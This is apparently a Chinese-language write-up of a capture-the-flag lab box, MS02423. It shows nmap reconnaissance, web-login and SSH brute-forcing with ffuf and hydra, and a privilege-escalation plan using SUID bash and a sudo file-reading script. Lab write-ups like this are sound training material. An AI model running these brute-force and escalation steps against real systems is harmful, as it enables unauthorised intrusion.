HMVM-MS02423

┌──(root㉿kali)-[~]
└─# arp-scan -I eth2 -l         
Interface: eth2, type: EN10MB, MAC: 00:0c:29:26:ba:7d, IPv4: 192.168.56.121
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:17       (Unknown: locally administered)
192.168.56.100  08:00:27:65:4f:3c       PCS Systemtechnik GmbH
192.168.56.126  08:00:27:1d:d5:20       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.111 seconds (121.27 hosts/sec). 3 responded
                                                                                                                                                                     
┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.56.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-10 23:59 EST
Nmap scan report for 192.168.56.126
Host is up (0.00068s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp  open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.59 (Debian)
| http-robots.txt: 6 disallowed entries 
| /admin.txt /login.txt .config .backup .user.txt 
|_/wp-admin
423/tcp open  http    Apache httpd 2.4.59 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: MS02423\xE7\xB3\xBB\xE7\xBB\x9F - \xE7\x99\xBB\xE5\xBD\x95
|_http-server-header: Apache/2.4.59 (Debian)
MAC Address: 08:00:27:1D:D5:20 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.68 ms 192.168.56.126

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.59 seconds
                                                                                                                                                                     
┌──(root㉿kali)-[~]

423端口

并扫出了80的robots.txt

/admin.txt /login.txt .config .backup .user.txt 
|_/wp-admin

.user.txt里有编码

解密得一个用户名字典 密码提示top500

admin
john
alice
sysadmin
ctf_player
<-----passwd top 500----->

抓个包看看怎么传参的

爆破

得到ctf_player:genesis

我这里用ffuf

补充几个筛选常用参数

-mc 200　只显示响应为200的

-fs 1191 筛选响应长度不为1191的

尝试手动fuzz一下命令，发现可以读/etc/passwd，其他的好像都读不了

那么发现有俩用户

2002:x:1000:1000:2002 User:/home/2002:/bin/bash
MS02423:x:1001:1001:MS02423 User:/home/MS02423:/bin/bash

直接爆破ssh即可 思路很固定

┌──(root㉿kali)-[~/yiyi]
└─# hydra -L users.txt -P rockyou.txt ssh://192.168.56.126 -V -I -u -f

Linux MS02423 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan 14 01:02:20 2026 from 192.168.137.102
-bash-5.0$ id
uid=1000(2002) gid=1000(2002) 组=1000(2002)
-bash-5.0$ ls
user.txt
-bash-5.0$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/bash
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
-bash-5.0$ sudo -l
匹配 %2$s 上 %1$s 的默认条目：
    !env_reset, mail_badpass, !env_reset, always_set_home

用户 2002 可以在 MS02423 上运行以下命令：
    (ALL) NOPASSWD: /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh
-bash-5.0$ cat /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh
cat: /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh: 权限不够
-bash-5.0$ id /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh
id: “/usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh”：无此用户
-bash-5.0$ ls -al /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/
总用量 12
drwxr-xr-x  2 root root 4096 1月  14 01:22 .
drwxr-xr-x 75 root root 4096 1月  12 23:33 ..
-rwx------  1 root root 3244 1月  14 01:22 gsjy.sh
-bash-5.0$ sudo /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh
==============================================
          通用目标查询脚本                      
==============================================
[使用格式] /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh <目标路径>
==============================================
-bash-5.0$ sudo /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh /root/root.txt
==============================================
          脚本执行提示                          
==============================================

[禁止] 不能处理该目标！
[建议] 试试处理其他目标路径。

==============================================
          脚本执行终止                          
==============================================
-bash-5.0$ sudo /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/hidden_gsjy/gsjy.sh /home/2002/user.txt
==============================================
          靶机通用目标查询脚本                  
==============================================

[任务] 准备处理目标：/home/2002/user.txt

------------------- 目标内容 -------------------
  flag:{user-2b169d1b87972948a3ccc88dd28bde99}
---------------------------------------------------

[成功] 已处理目标：/home/2002/user.txt

==============================================
          脚本执行完成                          
==============================================
-bash-5.0$ 

发现sudo有个脚本可以读文件 但是不能读root.txt

明确思路 首先bash有suid权限，那么bash后通过软连接读flag即可